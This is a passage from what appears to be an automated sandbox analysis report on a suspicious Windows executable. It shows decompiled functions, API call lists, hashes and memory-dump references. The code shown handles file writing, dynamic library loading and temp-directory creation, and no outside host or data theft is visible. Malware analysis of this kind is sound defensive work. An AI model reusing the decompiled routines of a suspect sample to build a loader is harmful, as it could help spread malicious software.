					_t34 = 0x4000;
					_t13 = _t12 -  *0x41f054;
					if(_t13 <= 0x4000) {
						_t34 = _t13;
					}
					_t14 = E004031BF(0x413040, _t34); // executed
					if(_t14 == 0) {
						break;
					}
					 *0x41f054 =  *0x41f054 + _t34;
					 *0x40afd0 = 0x413040;
					 *0x40afd4 = _t34;
					L6:
					L6:
					if( *0x423eb0 != 0 &&  *0x423f40 == 0) {
						 *0x417040 =  *0x41f050 -  *0x417044 - _a4 +  *0x40afb0;
						E00402BD3(0);
					}
					 *0x40afd8 = 0x40b040;
					 *0x40afdc = 0x8000; // executed
					_t16 = E00405F82(0x40afb8); // executed
					if(_t16 < 0) {
						goto L21;
					}
					_t39 =  *0x40afd8; // 0x410b48
					_t40 = _t39 - 0x40b040;
					if(_t40 == 0) {
						__eflags =  *0x40afd4; // 0x0
						if(__eflags != 0) {
							goto L21;
						}
						__eflags = _t34;
						if(_t34 == 0) {
							goto L21;
						}
						L17:
						_t18 =  *0x417044; // 0x440f2
						if(_t18 -  *0x40afb0 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x409018, _t18, 0, 0); // executed
						goto L23;
					}
					_t21 = WriteFile( *0x409018, 0x40b040, _t40,  &_v4, 0); // executed
					if(_t21 == 0 || _t40 != _v4) {
						_push(0xfffffffe);
						L22:
						_pop(_t17);
						return _t17;
					} else {
						 *0x40afb0 =  *0x40afb0 + _t40;
						_t53 =  *0x40afd4; // 0x0
						if(_t53 != 0) {
							goto L6;
						}
						goto L17;
					}
					L21:
					_push(0xfffffffd);
					goto L22;
				}
				return _t14 | 0xffffffff;
			}


















                                                                                    0x00403047
                                                                                    0x00403054
                                                                                    0x00403067
                                                                                    0x0040306c
                                                                                    0x004031ad
                                                                                    0x004031af
                                                                                    0x00000000
                                                                                    0x004031b5
                                                                                    0x00403078
                                                                                    0x0040308b
                                                                                    0x00403091
                                                                                    0x00403097
                                                                                    0x004030a2
                                                                                    0x004030a2
                                                                                    0x004030a7
                                                                                    0x004030ac
                                                                                    0x004030b4
                                                                                    0x004030b6
                                                                                    0x004030b6
                                                                                    0x004030bf
                                                                                    0x004030c6
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004030cc
                                                                                    0x004030d2
                                                                                    0x004030d8
                                                                                    0x00000000
                                                                                    0x004030de
                                                                                    0x004030e4
                                                                                    0x00403104
                                                                                    0x00403109
                                                                                    0x0040310e
                                                                                    0x00403114
                                                                                    0x0040311a
                                                                                    0x00403124
                                                                                    0x0040312b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040312d
                                                                                    0x00403133
                                                                                    0x00403135
                                                                                    0x00403169
                                                                                    0x0040316f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403171
                                                                                    0x00403173
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403175
                                                                                    0x00403175
                                                                                    0x00403188
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403197
                                                                                    0x00000000
                                                                                    0x00403197
                                                                                    0x00403145
                                                                                    0x0040314d
                                                                                    0x004031a4
                                                                                    0x004031aa
                                                                                    0x004031aa
                                                                                    0x00000000
                                                                                    0x00403155
                                                                                    0x00403155
                                                                                    0x0040315b
                                                                                    0x00403161
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403167
                                                                                    0x004031a8
                                                                                    0x004031a8
                                                                                    0x00000000
                                                                                    0x004031a8
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 00403058
                                                                                      • Part of subcall function 004031F1: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E9D,?), ref: 004031FF
                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F4E,00000004,00000000,00000000,00000000,?,?,?,00402EC4,000000FF,00000000), ref: 0040308B
                                                                                    • WriteFile.KERNELBASE(0040B040,00410B48,00000000,00000000,00413040,00004000,?,00000000,?,00402F4E,00000004,00000000,00000000,00000000,?,?), ref: 00403145
                                                                                    • SetFilePointer.KERNELBASE(000440F2,00000000,00000000,00413040,00004000,?,00000000,?,00402F4E,00000004,00000000,00000000,00000000,?,?), ref: 00403197
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: File$Pointer$CountTickWrite
                                                                                    • String ID: @0A
                                                                                    • API String ID: 2146148272-1363546919
                                                                                    • Opcode ID: 5717bb92db8eceb84bcfa3312431b9880db34fb8e18b0e02550951cbdd57df69
                                                                                    • Instruction ID: c862c83604f3b109b9ae356e59bf9e99270c6d64ee518f880403d0392c1b0dc8
                                                                                    • Opcode Fuzzy Hash: 5717bb92db8eceb84bcfa3312431b9880db34fb8e18b0e02550951cbdd57df69
                                                                                    • Instruction Fuzzy Hash: 4B41ABB25042029FD710CF29EE4096A7FBDF748356705423BE501BA2E1CB3C6E099B9E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00401F51, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 60%
                                                                                    			E00401F51(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x423f58");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x423f28 =  *0x423f28 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E004029F6(0xfffffff0);
				 *(_t34 + 8) = E004029F6(1);
				if( *((intOrPtr*)(_t34 - 0x14)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404F04(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x1c)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 0x34)), 0x400, 0x424000, 0x40af70, " ?B"); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x1c)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x18)) == _t27 && E0040364F(_t30) != 0) {
						FreeLibrary(_t30); // executed
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                                                    0x00401f51
                                                                                    0x00401f51
                                                                                    0x00401f56
                                                                                    0x00401f5d
                                                                                    0x00402019
                                                                                    0x00402164
                                                                                    0x00402164
                                                                                    0x0040288b
                                                                                    0x0040288e
                                                                                    0x0040289a
                                                                                    0x0040289a
                                                                                    0x00401f6c
                                                                                    0x00401f76
                                                                                    0x00401f79
                                                                                    0x00401f88
                                                                                    0x00401f8c
                                                                                    0x00401f92
                                                                                    0x00401f96
                                                                                    0x00402012
                                                                                    0x00000000
                                                                                    0x00402012
                                                                                    0x00401f98
                                                                                    0x00401fa2
                                                                                    0x00401fa6
                                                                                    0x00401fea
                                                                                    0x00401fa8
                                                                                    0x00401fab
                                                                                    0x00401fae
                                                                                    0x00401fde
                                                                                    0x00401fb0
                                                                                    0x00401fb3
                                                                                    0x00401fbc
                                                                                    0x00401fbe
                                                                                    0x00401fbe
                                                                                    0x00401fbc
                                                                                    0x00401fae
                                                                                    0x00401ff2
                                                                                    0x00402007
                                                                                    0x00402007
                                                                                    0x00000000
                                                                                    0x00401ff2
                                                                                    0x00401f7c
                                                                                    0x00401f82
                                                                                    0x00401f86
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C
                                                                                      • Part of subcall function 00404F04: lstrlenA.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
                                                                                      • Part of subcall function 00404F04: lstrlenA.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
                                                                                      • Part of subcall function 00404F04: lstrcatA.KERNEL32(0041FC78,00402C4A,00402C4A,0041FC78,00000000,00000000,00000000), ref: 00404F60
                                                                                      • Part of subcall function 00404F04: SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
                                                                                      • Part of subcall function 00404F04: SendMessageA.USER32 ref: 00404F98
                                                                                      • Part of subcall function 00404F04: SendMessageA.USER32 ref: 00404FB2
                                                                                      • Part of subcall function 00404F04: SendMessageA.USER32 ref: 00404FC0
                                                                                    • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                                                                                    • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402007
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                    • String ID: ?B
                                                                                    • API String ID: 2987980305-117478770
                                                                                    • Opcode ID: 8a5e19ada2a0501c23d939e05fc9a3d0d7d0ee5640c0e41b76e5c8575941fe9f
                                                                                    • Instruction ID: 83c29b7dad20212888764ed045f323035a642c1bbb84e8da84d377f5f563bf0e
                                                                                    • Opcode Fuzzy Hash: 8a5e19ada2a0501c23d939e05fc9a3d0d7d0ee5640c0e41b76e5c8575941fe9f
                                                                                    • Instruction Fuzzy Hash: D621EE72D04216EBCF207FA4DE49A6E75B06B44399F204237F511B52E0D77C4D41965E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004015B3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 85%
                                                                                    			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E004029F6(0xfffffff0);
				_t10 = E004056ED(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E00405684(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405B66("C:\\Users\\alfons\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                                                                                    0x004015b3
                                                                                    0x004015ba
                                                                                    0x004015bd
                                                                                    0x004015c2
                                                                                    0x004015c6
                                                                                    0x004015c8
                                                                                    0x004015d0
                                                                                    0x004015d6
                                                                                    0x004015d8
                                                                                    0x004015db
                                                                                    0x004015e3
                                                                                    0x004015f0
                                                                                    0x004015fd
                                                                                    0x004015fd
                                                                                    0x004015f2
                                                                                    0x004015f3
                                                                                    0x004015fb
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004015fb
                                                                                    0x004015f0
                                                                                    0x00401600
                                                                                    0x00401603
                                                                                    0x00401605
                                                                                    0x00401606
                                                                                    0x004015c8
                                                                                    0x0040160d
                                                                                    0x0040162d
                                                                                    0x00402164
                                                                                    0x0040160f
                                                                                    0x00401611
                                                                                    0x0040161c
                                                                                    0x00401622
                                                                                    0x00401622
                                                                                    0x0040288e
                                                                                    0x0040289a

                                                                                    APIs
                                                                                      • Part of subcall function 004056ED: CharNextA.USER32(0040549F,?,004218A8,00000000,00405751,004218A8,004218A8,?,?,7519F560,0040549F,?,"C:\Users\user\Desktop\5SXTKXCnqS.exe" ,7519F560), ref: 004056FB
                                                                                      • Part of subcall function 004056ED: CharNextA.USER32(00000000), ref: 00405700
                                                                                      • Part of subcall function 004056ED: CharNextA.USER32(00000000), ref: 0040570F
                                                                                    • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                                                    • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                                                    • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                                                    • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp
                                                                                    • API String ID: 3751793516-1943935188
                                                                                    • Opcode ID: 79158bb1b9e0f9446a8291b1140989ad94052719e68ebd3d846b01836d69eb3e
                                                                                    • Instruction ID: c38907cd9fbddcdb820990ab727de55d75fa8bca08f123d111df4852c942a759
                                                                                    • Opcode Fuzzy Hash: 79158bb1b9e0f9446a8291b1140989ad94052719e68ebd3d846b01836d69eb3e
                                                                                    • Instruction Fuzzy Hash: 7E010431D08141AFDB216F751D4497F27B0AA56369728073FF891B22E2C63C0942962E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040586C, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E0040586C(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                                                                                    0x00405870
                                                                                    0x00405876
                                                                                    0x00405877
                                                                                    0x00405877
                                                                                    0x00405878
                                                                                    0x0040587f
                                                                                    0x00405889
                                                                                    0x00405896
                                                                                    0x00405899
                                                                                    0x004058a1
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004058a5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004058a7
                                                                                    0x00000000
                                                                                    0x004058a7
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 0040587F
                                                                                    • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 00405899
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CountFileNameTempTick
                                                                                    • String ID: "C:\Users\user\Desktop\5SXTKXCnqS.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                                    • API String ID: 1716503409-184440182
                                                                                    • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                    • Instruction ID: 7bdb262dbebad2fb51735791196b4a750b565e3ebaa120aaaad2cbe3184e43fd
                                                                                    • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                    • Instruction Fuzzy Hash: B1F0A73734820876E7105E55DC04B9B7F9DDF91760F14C027FE44DA1C0D6B49954C7A5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 73CA16DB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 94%
                                                                                    			E73CA16DB(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v88;
				struct HINSTANCE__* _t37;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x73ca405c = _a8;
				 *0x73ca4060 = _a16;
				 *0x73ca4064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x73ca4038, E73CA1556);
				_push(1); // executed
				_t37 = E73CA1A98(); // executed
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E73CA22AF(_t54);
					}
					E73CA22F1(_t67, _t54);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x810) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_t37 = E73CA24D8(_t54);
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x818; // 0x818
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E73CA156B(_t54,  &_v88);
								 *(_t54 + 0x834) =  *(_t54 + 0x834) & 0x00000000;
								_t18 = _t54 + 0x818; // 0x818
								_t72 = _t18;
								 *((intOrPtr*)(_t54 + 0x820)) = _t42;
								 *_t72 = 3;
								E73CA24D8(_t54);
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							E73CA24D8(_t54);
							_t37 = GlobalFree(E73CA1266(E73CA1559(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E73CA249E(_t54);
							if(( *(_t54 + 0x810) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x808);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x810) & 0x00000020) != 0) {
								_t37 = E73CA14E2( *0x73ca4058);
							}
						}
						if(( *(_t54 + 0x810) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t54);
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E73CA2CC3(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E73CA2A38(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E73CA26B2(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}


















                                                                                    0x73ca16db
                                                                                    0x73ca16db
                                                                                    0x73ca16db
                                                                                    0x73ca16e5
                                                                                    0x73ca16ed
                                                                                    0x73ca16fa
                                                                                    0x73ca1708
                                                                                    0x73ca170b
                                                                                    0x73ca170d
                                                                                    0x73ca1712
                                                                                    0x73ca1717
                                                                                    0x73ca1836
                                                                                    0x73ca1836
                                                                                    0x73ca171d
                                                                                    0x73ca1721
                                                                                    0x73ca1724
                                                                                    0x73ca1729
                                                                                    0x73ca172b
                                                                                    0x73ca1731
                                                                                    0x73ca1737
                                                                                    0x73ca1767
                                                                                    0x73ca176e
                                                                                    0x73ca1792
                                                                                    0x73ca17dd
                                                                                    0x73ca1794
                                                                                    0x73ca1794
                                                                                    0x73ca1795
                                                                                    0x73ca179b
                                                                                    0x73ca179c
                                                                                    0x73ca17a6
                                                                                    0x73ca17a9
                                                                                    0x73ca17ae
                                                                                    0x73ca17b5
                                                                                    0x73ca17b5
                                                                                    0x73ca17bc
                                                                                    0x73ca17c2
                                                                                    0x73ca17c8
                                                                                    0x73ca17d5
                                                                                    0x73ca17d6
                                                                                    0x73ca17d9
                                                                                    0x73ca1770
                                                                                    0x73ca1771
                                                                                    0x73ca1786
                                                                                    0x73ca1786
                                                                                    0x73ca17e7
                                                                                    0x73ca17ea
                                                                                    0x73ca17f7
                                                                                    0x73ca17fe
                                                                                    0x73ca1806
                                                                                    0x73ca1809
                                                                                    0x73ca1809
                                                                                    0x73ca1806
                                                                                    0x73ca1816
                                                                                    0x73ca181e
                                                                                    0x73ca1823
                                                                                    0x73ca1816
                                                                                    0x73ca182b
                                                                                    0x00000000
                                                                                    0x73ca182d
                                                                                    0x00000000
                                                                                    0x73ca182e
                                                                                    0x73ca182b
                                                                                    0x73ca173b
                                                                                    0x73ca173e
                                                                                    0x73ca175c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca175f
                                                                                    0x73ca1764
                                                                                    0x73ca1764
                                                                                    0x73ca1766
                                                                                    0x00000000
                                                                                    0x73ca1766
                                                                                    0x73ca1740
                                                                                    0x73ca1741
                                                                                    0x73ca1749
                                                                                    0x73ca174a
                                                                                    0x00000000
                                                                                    0x73ca174a
                                                                                    0x73ca1743
                                                                                    0x73ca1744
                                                                                    0x73ca1752
                                                                                    0x00000000
                                                                                    0x73ca1752
                                                                                    0x73ca1747
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1747

                                                                                    APIs
                                                                                      • Part of subcall function 73CA1A98: GlobalFree.KERNEL32 ref: 73CA1D09
                                                                                      • Part of subcall function 73CA1A98: GlobalFree.KERNEL32 ref: 73CA1D0E
                                                                                      • Part of subcall function 73CA1A98: GlobalFree.KERNEL32 ref: 73CA1D13
                                                                                    • GlobalFree.KERNEL32 ref: 73CA1786
                                                                                    • FreeLibrary.KERNEL32(?), ref: 73CA1809
                                                                                    • GlobalFree.KERNEL32 ref: 73CA182E
                                                                                      • Part of subcall function 73CA22AF: GlobalAlloc.KERNEL32(00000040,?), ref: 73CA22E0
                                                                                      • Part of subcall function 73CA26B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,73CA1757,00000000), ref: 73CA2782
                                                                                      • Part of subcall function 73CA156B: wsprintfA.USER32 ref: 73CA1599
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.241754228.0000000073CA1000.00000020.00020000.sdmp, Offset: 73CA0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.241748462.0000000073CA0000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.241762854.0000000073CA3000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.241781372.0000000073CA5000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 3962662361-3916222277
                                                                                    • Opcode ID: a65fe931c2c166f5302db4c4e1e67842a62095faa58e327e692620f186c9f244
                                                                                    • Instruction ID: 8456d997427cda48a3e716ef74c2f1361a949157a7c7951bd4000cbcba1f0a87
                                                                                    • Opcode Fuzzy Hash: a65fe931c2c166f5302db4c4e1e67842a62095faa58e327e692620f186c9f244
                                                                                    • Instruction Fuzzy Hash: 9D41BE7200035A9BDB01EF6C8984B9A37ADBF04221F199025E95BEE1C6DF789445CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00403208, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 84%
                                                                                    			E00403208(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
				E00405DC8(_t6);
				_t2 = E004056C6(_t6);
				if(_t2 != 0) {
					E00405659(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E0040586C("1033", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}






                                                                                    0x00403209
                                                                                    0x0040320f
                                                                                    0x00403215
                                                                                    0x0040321c
                                                                                    0x00403221
                                                                                    0x00403229
                                                                                    0x00403235
                                                                                    0x0040323b
                                                                                    0x0040321f
                                                                                    0x0040321f
                                                                                    0x0040321f

                                                                                    APIs
                                                                                      • Part of subcall function 00405DC8: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\5SXTKXCnqS.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E20
                                                                                      • Part of subcall function 00405DC8: CharNextA.USER32(?,?,?,00000000), ref: 00405E2D
                                                                                      • Part of subcall function 00405DC8: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\5SXTKXCnqS.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E32
                                                                                      • Part of subcall function 00405DC8: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\5SXTKXCnqS.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E42
                                                                                    • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00403229
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
